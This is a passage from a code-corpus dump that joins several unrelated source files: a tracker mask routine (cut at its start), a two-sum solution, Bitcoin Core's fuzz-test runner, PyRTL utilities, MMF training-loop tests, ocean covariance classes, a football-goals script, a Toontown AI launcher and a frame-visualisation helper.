s = crop_box[2] / p.instance_size
sub_box = [crop_box[0] + (delta_x - p.base_size / 2) * p.total_stride * s,
crop_box[1] + (delta_y - p.base_size / 2) * p.total_stride * s,
s * p.exemplar_size, s * p.exemplar_size]
s = p.out_size / sub_box[2]
back_box = [-sub_box[0] * s, -sub_box[1] * s, state['im_w'] * s, state['im_h'] * s]
mask_in_img = crop_back(mask, back_box, (state['im_w'], state['im_h']))
target_mask = (mask_in_img > p.seg_thr).astype(np.uint8)
if cv2.__version__[-5] == '4':
contours, _ = cv2.findContours(target_mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
else:
_, contours, _ = cv2.findContours(target_mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
cnt_area = [cv2.contourArea(cnt) for cnt in contours]
if len(contours) != 0 and np.max(cnt_area) > 100:
contour = contours[np.argmax(cnt_area)] # use max area polygon
polygon = contour.reshape(-1, 2)
# pbox = cv2.boundingRect(polygon) # Min Max Rectangle
prbox = cv2.boxPoints(cv2.minAreaRect(polygon)) # Rotated Rectangle
# box_in_img = pbox
rbox_in_img = prbox
else: # empty mask
location = cxy_wh_2_rect(target_pos, target_sz)
rbox_in_img = np.array([[location[0], location[1]],
[location[0] + location[2], location[1]],
[location[0] + location[2], location[1] + location[3]],
[location[0], location[1] + location[3]]])
target_pos[0] = max(0, min(state['im_w'], target_pos[0]))
target_pos[1] = max(0, min(state['im_h'], target_pos[1]))
target_sz[0] = max(10, min(state['im_w'], target_sz[0]))
target_sz[1] = max(10, min(state['im_h'], target_sz[1]))
state['target_pos'] = target_pos
state['target_sz'] = target_sz
state['score'] = score[best_pscore_id]
state['mask'] = mask_in_img if mask_enable else []
state['ploygon'] = rbox_in_img if mask_enable else []
return state
|
the-stack_0_25896
|
'''
Question Link: https://leetcode.com/problems/two-sum/
Solution Explanation: https://www.code-recipe.com/post/two-sum
HashMap Method: store each value's index in a dict and look up target - value in a single pass (O(n) time, O(n) space).
'''
class Solution(object):
# Brute Force Solution
def twoSumBF(self, nums, target):
for bottom, bottomVal in enumerate(nums):
for top, topVal in enumerate(nums[bottom+1:]):
sum = bottomVal + topVal
if(sum == target):
return [bottom, top + bottom+1]
# HashMap - 1
def twoSumHM(self, nums, target):
hashMap = {}
for id, number in enumerate(nums):
hashMap[number] = id
keys = hashMap.keys()
for id,number in enumerate(nums):
if(target-number in keys):
if(hashMap[target-number] != id):
return [id, hashMap[target-number]]
# HashMap - Best
def twoSumHM2(self, nums: list, target:int) -> list:
prevMap = {}
for id, number in enumerate(nums):
diff = target - number
if diff in prevMap:
return [prevMap[diff], id]
prevMap[number] = id
return
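# Trace for the driver below (nums=[2,5,5,11], target=10): at id=2 the second 5
# finds diff 5 already stored at id=1, so twoSumHM2 returns [1, 2]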
nums = [2,5,5,11]
target = 10
SolutionObj = Solution()
print(SolutionObj.twoSumHM2(nums,target))
|
the-stack_0_25898
|
#!/usr/bin/env python3
# Copyright (c) 2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run fuzz test targets.
"""
import argparse
import configparser
import os
import sys
import subprocess
import logging
# Fuzzers known to lack a seed corpus in https://github.com/bitcoin-core/qa-assets/tree/master/fuzz_seed_corpus
FUZZERS_MISSING_CORPORA = [
"addr_info_deserialize",
"asmap",
"base_encode_decode",
"block",
"block_file_info_deserialize",
"block_filter_deserialize",
"block_header_and_short_txids_deserialize",
"bloom_filter",
"decode_tx",
"fee_rate_deserialize",
"flat_file_pos_deserialize",
"hex",
"integer",
"key_origin_info_deserialize",
"merkle_block_deserialize",
"out_point_deserialize",
"p2p_transport_deserializer",
"parse_hd_keypath",
"parse_numbers",
"parse_script",
"parse_univalue",
"partial_merkle_tree_deserialize",
"partially_signed_transaction_deserialize",
"prefilled_transaction_deserialize",
"psbt_input_deserialize",
"psbt_output_deserialize",
"pub_key_deserialize",
"rolling_bloom_filter",
"script_deserialize",
"strprintf",
"sub_net_deserialize",
"tx_in",
"tx_in_deserialize",
"tx_out",
]
def main():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
"-l",
"--loglevel",
dest="loglevel",
default="INFO",
help="log events at this level and higher to the console. Can be set to DEBUG, INFO, WARNING, ERROR or CRITICAL. Passing --loglevel DEBUG will output all logs to console.",
)
parser.add_argument(
'--export_coverage',
action='store_true',
help='If true, export coverage information to files in the seed corpus',
)
parser.add_argument(
'--valgrind',
action='store_true',
help='If true, run fuzzing binaries under the valgrind memory error detector',
)
parser.add_argument(
'-x',
'--exclude',
help="A comma-separated list of targets to exclude",
)
parser.add_argument(
'seed_dir',
help='The seed corpus to run on (must contain subfolders for each fuzz target).',
)
parser.add_argument(
'target',
nargs='*',
help='The target(s) to run. Default is to run all targets.',
)
args = parser.parse_args()
# Set up logging
logging.basicConfig(
format='%(message)s',
level=int(args.loglevel) if args.loglevel.isdigit() else args.loglevel.upper(),
)
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.abspath(os.path.dirname(__file__)) + "/../config.ini"
config.read_file(open(configfile, encoding="utf8"))
if not config["components"].getboolean("ENABLE_FUZZ"):
logging.error("Must have fuzz targets built")
sys.exit(1)
# Build list of tests
test_list_all = parse_test_list(makefile=os.path.join(config["environment"]["SRCDIR"], 'src', 'Makefile.test.include'))
if not test_list_all:
logging.error("No fuzz targets found")
sys.exit(1)
logging.debug("{} fuzz target(s) found: {}".format(len(test_list_all), " ".join(sorted(test_list_all))))
args.target = args.target or test_list_all # By default run all
test_list_error = list(set(args.target).difference(set(test_list_all)))
if test_list_error:
logging.error("Unknown fuzz targets selected: {}".format(test_list_error))
test_list_selection = list(set(test_list_all).intersection(set(args.target)))
if not test_list_selection:
logging.error("No fuzz targets selected")
if args.exclude:
for excluded_target in args.exclude.split(","):
if excluded_target not in test_list_selection:
logging.error("Target \"{}\" not found in current target list.".format(excluded_target))
continue
test_list_selection.remove(excluded_target)
test_list_selection.sort()
logging.info("{} of {} detected fuzz target(s) selected: {}".format(len(test_list_selection), len(test_list_all), " ".join(test_list_selection)))
try:
help_output = subprocess.run(
args=[
os.path.join(config["environment"]["BUILDDIR"], 'src', 'test', 'fuzz', test_list_selection[0]),
'-help=1',
],
timeout=10,
check=True,
stderr=subprocess.PIPE,
universal_newlines=True,
).stderr
if "libFuzzer" not in help_output:
logging.error("Must be built with libFuzzer")
sys.exit(1)
except subprocess.TimeoutExpired:
logging.error("subprocess timed out: Currently only libFuzzer is supported")
sys.exit(1)
run_once(
corpus=args.seed_dir,
test_list=test_list_selection,
build_dir=config["environment"]["BUILDDIR"],
export_coverage=args.export_coverage,
use_valgrind=args.valgrind,
)
def run_once(*, corpus, test_list, build_dir, export_coverage, use_valgrind):
for t in test_list:
corpus_path = os.path.join(corpus, t)
if t in FUZZERS_MISSING_CORPORA:
os.makedirs(corpus_path, exist_ok=True)
args = [
os.path.join(build_dir, 'src', 'test', 'fuzz', t),
'-runs=1',
corpus_path,
]
if use_valgrind:
args = ['valgrind', '--quiet', '--error-exitcode=1'] + args
logging.debug('Run {} with args {}'.format(t, args))
result = subprocess.run(args, stderr=subprocess.PIPE, universal_newlines=True)
output = result.stderr
logging.debug('Output: {}'.format(output))
try:
result.check_returncode()
except subprocess.CalledProcessError as e:
if e.stdout:
logging.info(e.stdout)
if e.stderr:
logging.info(e.stderr)
logging.info("Target \"{}\" failed with exit code {}: {}".format(t, e.returncode, " ".join(args)))
sys.exit(1)
if not export_coverage:
continue
for l in output.splitlines():
if 'INITED' in l:
with open(os.path.join(corpus, t + '_coverage'), 'w', encoding='utf-8') as cov_file:
cov_file.write(l)
break
def parse_test_list(makefile):
with open(makefile, encoding='utf-8') as makefile_test:
test_list_all = []
read_targets = False
for line in makefile_test.readlines():
line = line.strip().replace('test/fuzz/', '').replace(' \\', '')
if read_targets:
if not line:
break
test_list_all.append(line)
continue
if line == 'FUZZ_TARGETS =':
read_targets = True
return test_list_all
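# For reference, parse_test_list() above assumes the FUZZ_TARGETS block in
# src/Makefile.test.include looks roughly like the (hypothetical) excerpt
# below: a "FUZZ_TARGETS =" line followed by "test/fuzz/<name> \" continuation
# lines, terminated by a blank line.
#
#   FUZZ_TARGETS = \
#     test/fuzz/addr_info_deserialize \
#     test/fuzz/asmap \
#     test/fuzz/base_encode_decode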
if __name__ == '__main__':
main()
|
the-stack_0_25899
|
import collections
from logging import warn
import operator
import math
import six
from functools import reduce
import pyrtl
def gray_code(n):
""" Get the binary-reflected gray code of n """
n = pyrtl.as_wires(n)
return n ^ n[1:]
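# Worked example (added for clarity, not part of the original source): for a
# 4-bit value n = 0b0110, n[1:] drops the LSB (0b011), so
# n ^ n[1:] = 0b0110 ^ 0b0011 = 0b0101, the binary-reflected gray code of 6.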
def signed_sub(a, b):
""" Return a WireVector for result of signed subtraction.
:param a: a WireVector to serve as first input to subtraction
:param b: a WireVector to serve as second input to subtraction
Given a length n WireVector and length m WireVector the result of the
signed subtraction is length max(n,m)+1. The inputs are twos
complement sign extended to the same length before subtracting.
If an integer is passed to either a or b, it will be converted
automatically to a two's complemented constant.
"""
if isinstance(a, (int, six.string_types)):
a = pyrtl.Const(a, signed=True)
if isinstance(b, (int, six.string_types)):
b = pyrtl.Const(b, signed=True)
a, b = pyrtl.match_bitwidth(pyrtl.as_wires(a), pyrtl.as_wires(b), signed=True)
result_len = len(a) + 1
ext_a = a.sign_extended(result_len)
ext_b = b.sign_extended(result_len)
    # subtract and truncate to the correct length
return (ext_a - ext_b)[0:result_len]
CheckedResult = collections.namedtuple('CheckedResult', ['result', 'overflow'])
def checked_sub(a, b, bitwidth):
res = signed_sub(a, b).truncate(bitwidth)
# TODO All of these use subtraction under the hood, so this is less 'efficient'
# then we really need, given that we're also doing subtraction in signed_sub.
# Probably better to just have one function that does it all.
cond1 = pyrtl.signed_ge(a, 0) & pyrtl.signed_lt(b, 0) & pyrtl.signed_lt(res, 0)
cond2 = pyrtl.signed_lt(a, 0) & pyrtl.signed_ge(b, 0) & pyrtl.signed_ge(res, 0)
return CheckedResult(res, cond1 | cond2)
def difference(x, y):
""" Returns max(x, y) - min(x, y) [taking signedness into account] """
# Doing this verbosely because I only want one call to signed_sub.
x_gt_y = pyrtl.signed_gt(x, y)
high = pyrtl.select(x_gt_y, x, y)
low = pyrtl.select(x_gt_y, y, x)
return signed_sub(high, low)
def negate(x):
""" Negate a number (a la twos complement), not invert """
# Use this to automatically get correct size out (~x + 1 doesn't get it automatically)
return signed_sub(0, x)
def count_ones(w):
""" Count the number of one bits in a wire """
return reduce(operator.add, w)
# Could also do this:
# return pyrtl.tree_reduce(operator.add, w)
def count_zeroes(w):
return len(w) - count_ones(w)
# Two versions of the same function:
# - count_zeroes_from_end_fold()
# - count_zeroes_from_end()
# Both are here just to see difference in programming complexity and generated netlist complexity
def count_zeroes_from_end_fold(x, start='msb'):
def f(accum, x):
found, count = accum
is_zero = x == 0
to_add = ~found & is_zero
count = count + to_add
return (found | ~is_zero, count)
xs = x[::-1] if start == 'msb' else x
return reduce(f, xs, (pyrtl.as_wires(False), 0))[1]
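# Illustrative example (not in the original source): with x = pyrtl.Const(0b0010, bitwidth=4)
# and start='msb', the fold counts the run of leading zeros, giving 2 for this constant.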
# NOTE: this is essentially a fold, so we could probably use the stdlib's
# functools.reduce function (see above)
def count_zeroes_from_end(x, start='msb'):
if start not in ('msb', 'lsb'):
raise pyrtl.PyrtlError('Invalid start parameter')
def _count(x, found):
end = x[-1] if start == 'msb' else x[0]
is_zero = end == 0
to_add = ~found & is_zero
if len(x) == 1:
return to_add
else:
rest = x[:-1] if start == 'msb' else x[1:]
rest_to_add = _count(rest, found | ~is_zero)
return to_add + rest_to_add
return _count(x, pyrtl.as_wires(False))
def bitwidth_for_index(w):
""" Returns the number of bits needed to index every bit of w.
:param w: the wire being indexed into
:return: the number of bits needed to index every bit of w
Examples::
0bx requires a 1 bit index wv (index bit 0 only)
0bxx requires a 1 bit index wv (index bit 0 and 1)
0bxxx requires a 2 bit index wv (index bits 0, 1, and 2)
0bxxxx requires a 2 bit index wv (index bits 0, 1, 2, and 3)
0bxxxxx requires a 3 bit index wv (index bits 0, 1, 2, 3, and 4)
0bxxxxxx requires a 3 bit index wv (index bits 0, 1, 2, 3, 4, and 5)
"""
    if w.bitwidth <= 1:
        return 1
    return int(math.floor(math.log2(w.bitwidth - 1)) + 1)
def rtl_index(w, ix):
"""
Like doing `w[ix]`
"""
return pyrtl.shift_right_logical(w, ix)[0]
# Could also do this:
# return rtl_slice(w, ix, ix+1)
def rtl_slice(w, *args):
""" Slice into a WireVector using WireVectors as the start (optional), end, and
step (optional) values.
Signatures::
rtl_slice(w, stop)
rtl_slice(w, start, stop[, step])
:param w: the WireVector or int to index into.
:param start: the starting value of the counter, inclusive (default: 0);
this is treated as *signed*.
:param stop: the stopping value of the counter, exclusive (default: len(w));
this is treated as *signed*.
:param step: the step size of the counter (default: 1);
this is treated as *signed*.
:return: a slice of the original WireVector, i.e. a subsection of the
original wire, possibly with some skipped bits depending on the value of step.
The width of the slice totally depends on the argument values.
It's probably easiest to think of calling `rtl_slice(w, start, end, step)`
as being equivalent to `w[start:end:step]` or `w[slice(start, end, step)]`.
This function is used to overcome the (very reasonable) limitation that PyRTL imposes on
slicing a WireVector: that the slice indices meet the same constraints as normal Python
slices.
Needing to use wires as indices is typically a sign that the object you're
indexing into should be a memory, but this function is provided for experimentation
nonetheless. Note that this will create a large series of muxes.
Also note that it is an error for step to be 0; we currently don't report this error
(instead just returning a 0 wire), but this function might be changed to return an
error wire indicating such an occurence instead.
There are no requirements on the bitwidth of step.
Example::
rtl_slice(
pyrtl.Const(0b10110010),
pyrtl.Const(2), # start (inclusive)
pyrtl.Const(8), # end (exclusive)
pyrtl.Const(3) # step
) == 0b10
From...
end (exclusive) to...
| start (inclusive)
| |
v v
0b10110010
^ ^
| |
get every 3rd bit, and concatenate to, get 0b10
"""
w = pyrtl.as_wires(w)
start, stop, step = None, None, None
if len(args) == 1:
stop = args[0]
elif len(args) == 2:
start, stop = args
elif len(args) == 3:
start, stop, step = args
else:
raise pyrtl.PyrtlError(
"rtl_slice takes 1 argument (stop), 2 arguments (start, stop), "
"or 3 arguments (start, stop, step)."
)
if start is None:
start = 0
if stop is None:
stop = w.bitwidth
if step is None:
step = 1
if all(isinstance(x, int) for x in (start, stop, step)):
import warnings
warnings.warn(
"Integer values (or defaults) were provided as the start and end indices "
"and step to `rtl_slice()`. Consider using standard slicing notation instead: "
"`w[start:stop:step]`."
)
# Instead of just making them all wires via as_wires,
# we can be smarter and more efficient by using slice nets when possible.
if isinstance(start, int):
w = w[start:]
else:
assert isinstance(start, pyrtl.WireVector)
shift_amount = pyrtl.select(
pyrtl.signed_lt(start, 0),
pyrtl.signed_add(w.bitwidth, start),
start
)
w = pyrtl.shift_right_logical(w, shift_amount)
if isinstance(stop, int):
w = w[:stop]
else:
assert isinstance(stop, pyrtl.WireVector)
# Dev note: this is either wrong, or is correct and can be simplified...
# Make start_c a wire so we can ensure its signed properly (rather than
# allow it to be coerced unsigned in the arithmetic below); ensuring it's
# signed is done by passing in an explicit bitwidth to `as_wires()`.
start_c = pyrtl.as_wires(start, bitwidth=(
start.bitwidth if isinstance(start, pyrtl.WireVector) else stop.bitwidth)
)
count = pyrtl.select(
pyrtl.signed_lt(stop, 0),
pyrtl.signed_add(w.bitwidth, stop),
pyrtl.select(
pyrtl.signed_lt(start_c, 0),
stop,
stop - start_c,
)
)
mask = pyrtl.shift_left_logical(pyrtl.Const(1, w.bitwidth), count) - 1
w = w & mask
if isinstance(step, int):
w = w[::step] # ValueError if step is 0
else:
assert isinstance(step, pyrtl.WireVector)
wn = pyrtl.WireVector(w.bitwidth)
stepn = pyrtl.WireVector(step.bitwidth)
with pyrtl.conditional_assignment:
with pyrtl.signed_lt(step, 0):
stepn |= negate(step)
wn |= w[::-1]
with pyrtl.otherwise:
stepn |= step
wn |= w
stepn = stepn if 2**stepn.bitwidth >= wn.bitwidth else (
stepn.zero_extended(bitwidth_for_index(wn))
)
w = pyrtl.mux(
stepn,
pyrtl.Const(0), # A step of 0 is invalid; report that with error line later
*[wn[::s] for s in range(1, wn.bitwidth)],
default=wn[0].zero_extended(wn.bitwidth) # any step > w.bitwidth is just first bit
)
return w
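if __name__ == '__main__':
    # Minimal illustrative sketch (not part of the original module): build and
    # simulate gray_code() and signed_sub() once. The wire names and constant
    # values below are arbitrary choices for this demo.
    gray_out = pyrtl.Output(bitwidth=4, name='gray_out')
    gray_out <<= gray_code(pyrtl.Const(0b0110, bitwidth=4))
    sub_out = pyrtl.Output(bitwidth=5, name='sub_out')
    sub_out <<= signed_sub(3, 5)
    sim = pyrtl.Simulation()
    sim.step({})
    print('gray(0b0110) =', bin(sim.inspect('gray_out')))  # expect 0b101
    print('3 - 5 =', bin(sim.inspect('sub_out')))  # 0b11110, i.e. -2 in 5-bit two's complement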
|
the-stack_0_25900
|
# Copyright (c) Facebook, Inc. and its affiliates.
import unittest
from unittest.mock import patch
import torch
from mmf.common.registry import registry
from mmf.utils.general import get_batch_size
from tests.test_utils import SimpleModel
from tests.trainers.test_trainer_mocks import TrainerTrainingLoopMock
class TestTrainingLoop(unittest.TestCase):
def test_update_frequency_num_remaining_updates_greater_than_update_frequency(self):
trainer1 = self._train_with_condition(
num_train_data=20,
max_updates=None,
max_epochs=2,
update_frequency=3,
batch_size=6,
)
self.assertEqual(trainer1.num_updates, 4)
trainer2 = self._train_with_condition(
num_train_data=20,
max_updates=4,
max_epochs=None,
update_frequency=1,
batch_size=18,
)
self.assertEqual(trainer2.num_updates, 4)
self._compare_model_params(trainer1, trainer2)
def test_update_frequency_reporting(self):
def _on_update_end(report, meter, should_log):
# the losses here should be the sum of two losses in
# iteration 0 and iteration 1 (both constitute update 0).
# Here iter 1 loss: 0.2599, iter 2 loss: 4.2090
loss = report.losses["loss"].detach().cpu().item()
self.assertAlmostEqual(loss, 4.4688, 4)
self._train_with_condition(
num_train_data=100,
max_updates=1,
max_epochs=None,
update_frequency=2,
batch_size=2,
on_update_end_fn=_on_update_end,
)
def test_update_frequency_correct_final_iteration(self):
trainer = TrainerTrainingLoopMock(100, 2, None, update_frequency=2)
trainer.load_datasets()
trainer.training_loop()
self.assertEqual(trainer.max_updates, 2)
self.assertEqual(trainer.current_iteration, 4)
def test_update_frequency_same_model_params(self):
trainer1 = self._train_with_condition(
num_train_data=100,
max_updates=2,
max_epochs=None,
update_frequency=2,
batch_size=2,
)
trainer1.load_datasets()
trainer2 = self._train_with_condition(
num_train_data=100,
max_updates=2,
max_epochs=None,
update_frequency=1,
batch_size=4,
)
trainer2.load_datasets()
self._compare_model_params(trainer1, trainer2)
def _compare_model_params(self, trainer1, trainer2):
for param1, param2 in zip(
trainer1.model.parameters(), trainer2.model.parameters()
):
self.assertTrue(torch.allclose(param1, param2))
def _train_with_condition(
self,
num_train_data,
max_updates,
max_epochs,
update_frequency,
batch_size,
on_update_end_fn=None,
):
torch.random.manual_seed(2)
model = SimpleModel({"in_dim": 1})
model.build()
opt = torch.optim.SGD(model.parameters(), lr=0.01)
trainer = TrainerTrainingLoopMock(
num_train_data,
max_updates,
max_epochs,
optimizer=opt,
update_frequency=update_frequency,
batch_size=batch_size,
)
trainer.load_datasets()
if on_update_end_fn:
trainer.on_update_end = on_update_end_fn
model.to(trainer.device)
trainer.model = model
trainer.training_loop()
return trainer
def test_epoch_over_updates(self):
trainer = TrainerTrainingLoopMock(100, 2, 0.04)
trainer.load_datasets()
max_updates = trainer._calculate_max_updates()
self.assertEqual(max_updates, 4)
self.check_values(trainer, 0, 0, 0)
trainer.training_loop()
self.check_values(trainer, 4, 1, 4)
def test_fractional_epoch(self):
trainer = TrainerTrainingLoopMock(100, None, 0.04)
trainer.load_datasets()
max_updates = trainer._calculate_max_updates()
self.assertEqual(max_updates, 4)
self.check_values(trainer, 0, 0, 0)
trainer.training_loop()
self.check_values(trainer, 4, 1, 4)
def test_updates(self):
trainer = TrainerTrainingLoopMock(100, 2, None)
trainer.load_datasets()
max_updates = trainer._calculate_max_updates()
self.assertEqual(max_updates, 2)
self.check_values(trainer, 0, 0, 0)
trainer.training_loop()
self.check_values(trainer, 2, 1, 2)
def test_batch_size_per_device(self):
# Need to patch the mmf.utils.general's world size not mmf.utils.distributed
# as the first one is what will be used
with patch("mmf.utils.general.get_world_size", return_value=2):
trainer = TrainerTrainingLoopMock(100, 2, None, batch_size=4)
registry.register("config", trainer.config)
batch_size = get_batch_size()
trainer.config.training.batch_size = batch_size
trainer.load_datasets()
# Train loader has batch size per device, for global batch size 4
# with world size 2, batch size per device should 4 // 2 = 2
self.assertEqual(trainer.train_loader.current_loader.batch_size, 2)
# This is per device, so should stay same
trainer = TrainerTrainingLoopMock(100, 2, None, batch_size_per_device=4)
registry.register("config", trainer.config)
batch_size = get_batch_size()
trainer.config.training.batch_size = batch_size
trainer.load_datasets()
self.assertEqual(trainer.train_loader.current_loader.batch_size, 4)
max_updates = trainer._calculate_max_updates()
self.assertEqual(max_updates, 2)
self.check_values(trainer, 0, 0, 0)
trainer.training_loop()
self.check_values(trainer, 2, 1, 2)
def check_values(self, trainer, current_iteration, current_epoch, num_updates):
self.assertEqual(trainer.current_iteration, current_iteration)
self.assertEqual(trainer.current_epoch, current_epoch)
self.assertEqual(trainer.num_updates, num_updates)
|
the-stack_0_25902
|
# (C) Crown Copyright, Met Office. All rights reserved.
#
# This file is part of ocean_error_covs and is released under the BSD 3-Clause license.
# See LICENSE in the root of the repository for full licensing details.
######################################################################
import numpy as np
class CovPairArrays():
def __init__(self, dims):
self.x = np.zeros(dims)
self.y = np.zeros(dims)
self.x_sq = np.zeros(dims)
self.y_sq = np.zeros(dims)
self.xy = np.zeros(dims)
self.sep_dist = np.zeros(dims)
def append_cov_pair(self, upd):
self.x = np.append(self.x, upd.x)
self.y = np.append(self.y, upd.y)
self.x_sq = np.append(self.x_sq, upd.x_sq)
self.y_sq = np.append(self.y_sq, upd.y_sq)
self.xy = np.append(self.xy, upd.xy)
self.sep_dist = np.append(self.sep_dist, upd.sep_dist)
return self
class CovSumStats():
def __init__(self, dims):
self.sum_x = np.ma.zeros(dims)
self.sum_y = np.ma.zeros(dims)
self.sum_x_sq = np.ma.zeros(dims)
self.sum_y_sq = np.ma.zeros(dims)
self.sum_xy = np.ma.zeros(dims)
self.num_pairs_in_cov = np.ma.zeros(dims,dtype=np.int32)
def __add__(self, upd):
update = CovSumStats(self.sum_x.shape)
update.sum_x = self.sum_x + upd.sum_x
update.sum_y = self.sum_y + upd.sum_y
update.sum_x_sq = self.sum_x_sq + upd.sum_x_sq
update.sum_y_sq = self.sum_y_sq + upd.sum_y_sq
update.sum_xy = self.sum_xy + upd.sum_xy
update.num_pairs_in_cov = self.num_pairs_in_cov + upd.num_pairs_in_cov
return update
class GridSumStats():
def __init__(self, dims):
self.num_obs_in_grid = np.ma.zeros(dims, dtype=np.int32)
self.grid_sum = np.ma.zeros(dims)
self.grid_sum_obs_std = np.ma.zeros(dims)
self.grid_sum_sq = np.ma.zeros(dims)
def __add__(self, upd):
update = GridSumStats(self.grid_sum.shape)
update.num_obs_in_grid = self.num_obs_in_grid + upd.num_obs_in_grid
update.grid_sum_obs_std = self.grid_sum_obs_std + upd.grid_sum_obs_std
update.grid_sum = self.grid_sum + upd.grid_sum
update.grid_sum_sq = self.grid_sum_sq + upd.grid_sum_sq
return update
class FdbkVarArrays():
def __init__(self):
self.obs_vals = ()
self.obs_std = ()
self.mod_vals = ()
self.obs_qc = ()
self.lons = ()
self.lats = ()
def __getitem__(self, i):
update = FdbkVarArrays()
update.obs_vals = self.obs_vals[i]
update.obs_std = self.obs_std[i]
update.mod_vals = self.mod_vals[i]
update.obs_qc = self.obs_qc[i]
update.lons = self.lons[i]
update.lats = self.lats[i]
return update
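if __name__ == "__main__":
    # Minimal illustrative check (added for this write-up, not part of the
    # original module): the __add__ overload accumulates the running sums
    # elementwise, which is how partial statistics from separate batches of
    # observation pairs would be combined.
    a = CovSumStats((2, 3))
    b = CovSumStats((2, 3))
    a.num_pairs_in_cov += 1
    combined = a + b
    print(combined.num_pairs_in_cov)  # expect a 2x3 array of ones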
|
the-stack_0_25903
|
jogador = {}
jogador['nome'] = str(input('Player name: ')).strip().capitalize()
np = int(input(f'How many matches did {jogador["nome"]} play? '))
gols = []
tot = 0
for c in range(0, np):
    g = int(input(f'How many goals in match {c+1}? '))
    gols.append(g)
    tot += g
jogador['gols'] = gols
jogador['total'] = tot
print('-='*30)
print(jogador)
print('-='*30)
for k, v in jogador.items():
    print(f'The field {k} holds the value {v}.')
print('-='*30)
print(f'The player {jogador["nome"]} played {np} matches.')
p = 0
for x in jogador['gols']:
    p += 1
    print(f' => In match {p}, scored {x} goals.')
print(f'That makes a total of {jogador["total"]} goals.')
|
the-stack_0_25904
|
import __builtin__
__builtin__.process = 'ai'
# Temporary hack patch:
__builtin__.__dict__.update(__import__('pandac.PandaModules', fromlist=['*']).__dict__)
from direct.extensions_native import HTTPChannel_extensions
from direct.showbase import PythonUtil
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--base-channel', help='The base channel that the server may use.')
parser.add_argument('--max-channels', help='The number of channels the server may use.')
parser.add_argument('--stateserver', help="The control channel of this AI's designated State Server.")
parser.add_argument('--district-name', help="What this AI Server's district will be named.")
parser.add_argument('--astron-ip', help="The IP address of the Astron Message Director to connect to.")
parser.add_argument('--eventlogger-ip', help="The IP address of the Astron Event Logger to log to.")
parser.add_argument('config', nargs='*', default=['config/general.prc', 'config/release/dev.prc'], help="PRC file(s) to load.")
args = parser.parse_args()
for prc in args.config:
loadPrcFile(prc)
localconfig = ''
if args.base_channel: localconfig += 'air-base-channel %s\n' % args.base_channel
if args.max_channels: localconfig += 'air-channel-allocation %s\n' % args.max_channels
if args.stateserver: localconfig += 'air-stateserver %s\n' % args.stateserver
if args.district_name: localconfig += 'district-name %s\n' % args.district_name
if args.astron_ip: localconfig += 'air-connect %s\n' % args.astron_ip
if args.eventlogger_ip: localconfig += 'eventlog-host %s\n' % args.eventlogger_ip
loadPrcFileData('Command-line', localconfig)
from otp.ai.AIBaseGlobal import *
from toontown.ai.ToontownAIRepository import ToontownAIRepository
simbase.air = ToontownAIRepository(config.GetInt('air-base-channel', 401000000),
config.GetInt('air-stateserver', 4002),
config.GetString('district-name', 'Devhaven'))
host = config.GetString('air-connect', '127.0.0.1')
port = 7100
if ':' in host:
host, port = host.split(':', 1)
port = int(port)
simbase.air.connect(host, port)
try:
run()
except SystemExit:
raise
except Exception:
info = PythonUtil.describeException()
simbase.air.writeServerEvent('ai-exception', avId=simbase.air.getAvatarIdFromSender(), accId=simbase.air.getAccountIdFromSender(), exception=info)
with open(config.GetString('ai-crash-log-name', 'ai-crash.txt'), 'w+') as file:
file.write(info + "\n")
raise
|
the-stack_0_25905
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
def pred_visualization(fname, arrays, picks, img_shape, tile_spacing=(0, 0),
scale_rows_to_unit_interval=True,
output_pixel_vals=True):
"""Used for visualization of predictions
Args:
fname: filename for saving the image
arrays: list of arrays containing the frames, first array is assumed to be
ground truth (all of shape Nxnframesxframesize**2)
picks: list containing indices of cases that should be used
img_shape: shape of a frame
tile_spacing: spacing between the tiles
scale_rows_to_unit_interval: see tile_raster_images
output_pixel_vals: see tile_raster_images
"""
ncases = len(picks)
narrays = len(arrays)
if narrays > 1:
horizon = arrays[1].shape[1]
horizon_gt = arrays[0].shape[1]
n_presteps = horizon_gt - horizon
if n_presteps > 0:
visdata = np.ones(
(ncases, horizon_gt * narrays, np.prod(img_shape)))
visdata[:, :horizon_gt] = arrays[0][picks]
for i in range(1, narrays):
visdata[:, i * horizon_gt:(i + 1) * horizon_gt] = \
np.hstack((
(np.ones((ncases, n_presteps, np.prod(img_shape)))),
arrays[i][picks]))
else:
visdata = np.hstack([arrays[i][picks] for i in range(narrays)])
else:
horizon = arrays[0].shape[1]
horizon_gt = horizon
visdata = np.hstack([arrays[i][picks] for i in range(narrays)])
visdata = visdata.reshape(ncases * narrays * horizon_gt, -1)
im = tile_raster_images(visdata, img_shape, (ncases * narrays, horizon_gt),
tile_spacing,
scale_rows_to_unit_interval, output_pixel_vals)
for i in range(len(picks) * len(arrays)):
# insert white patches for n_presteps
for j in range(horizon_gt - horizon):
if i % len(arrays) != 0:
im[i * img_shape[0] + i * tile_spacing[0]:(i + 1) * img_shape[0] + i * tile_spacing[0],
j * img_shape[1] + j * tile_spacing[1]:(j + 1) * img_shape[1] + j * tile_spacing[1]] = 255
h, w = im.shape
fig = plt.figure(frameon=False)
# fig.set_size_inches(1,h/np.float(w))
fig.set_size_inches(w / 24., h / 24.)
ax = plt.Axes(fig, [0., 0., 1., 1.])
ax.set_axis_off()
fig.add_axes(ax)
ax.imshow(im, aspect='normal', interpolation='nearest')
fig.savefig(fname, dpi=24)
return im
def scale_to_unit_interval(ndar, eps=1e-8):
""" Scales all values in the ndarray ndar to be between 0 and 1 """
ndar = ndar.copy()
ndar -= ndar.min()
ndar *= 1.0 / (ndar.max() + eps)
return ndar
def tile_raster_images(X, img_shape, tile_shape, tile_spacing=(0, 0),
scale_rows_to_unit_interval=True, output_pixel_vals=True):
"""
Transform an array with one flattened image per row, into an array in
    which images are reshaped and laid out like tiles on a floor.
This function is useful for visualizing datasets whose rows are images,
and also columns of matrices for transforming those rows
(such as the first layer of a neural net).
:type X: a 2-D ndarray or a tuple of 4 channels, elements of which can
be 2-D ndarrays or None;
:param X: a 2-D array in which every row is a flattened image.
:type img_shape: tuple; (height, width)
